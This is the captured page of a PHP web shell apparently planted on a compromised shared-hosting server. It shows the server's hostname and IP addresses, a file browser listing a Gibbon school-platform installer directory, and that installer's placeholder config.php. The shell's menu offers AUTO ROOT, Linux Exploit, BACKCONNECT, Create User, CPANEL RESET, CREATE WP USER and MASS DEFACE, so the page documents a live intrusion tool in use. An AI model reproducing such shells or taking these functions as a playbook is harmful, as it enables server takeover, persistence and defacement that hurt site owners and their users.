Linux br942.hostgator.com.br 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Apache
: 162.241.2.188 | : 3.23.128.245
Cant Read [ /etc/named.conf ]
8.2.22
manoe678
May The Force Be With You
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
MASS DEFACE
+ Create Folder
+ Create File
/
var /
softaculous /
gibbon /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
changelog.txt
6.82
KB
-rw-r--r--
clone.php
5.14
KB
-rw-r--r--
config.php
1.44
KB
-rw-r--r--
edit.php
4.31
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
1.03
KB
-rw-r--r--
import.php
3.51
KB
-rw-r--r--
info.xml
7.21
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
5.85
KB
-rw-r--r--
install.xml
1.73
KB
-rw-r--r--
md5
2.42
KB
-rw-r--r--
notes.txt
1.68
KB
-rw-r--r--
upgrade.php
4.53
KB
-rw-r--r--
upgrade.xml
367
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php /* Gibbon: the flexible, open school platform Founded by Ross Parker at ICHK Secondary. Built by Ross Parker, Sandra Kuipers and the Gibbon community (https://gibbonedu.org/about/) Copyright © 2010, Gibbon Foundation Gibbon™, Gibbon Education Ltd. (Hong Kong) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. */ /** * Sets the database connection information. * You can supply an optional $databasePort if your server requires one. */ $databaseServer = '[[softdbhost]]'; $databaseUsername = '[[softdbuser]]'; $databasePassword = '[[softdbpass]]'; $databaseName = '[[softdb]]'; /** * Sets a globally unique id, to allow multiple installs on a single server. */ $guid = '[[guid]]'; /** * Sets system-wide caching factor, used to balance performance and freshness. * Value represents number of page loads between cache refresh. * Must be positive integer. 1 means no caching. */ $caching = 10;
Close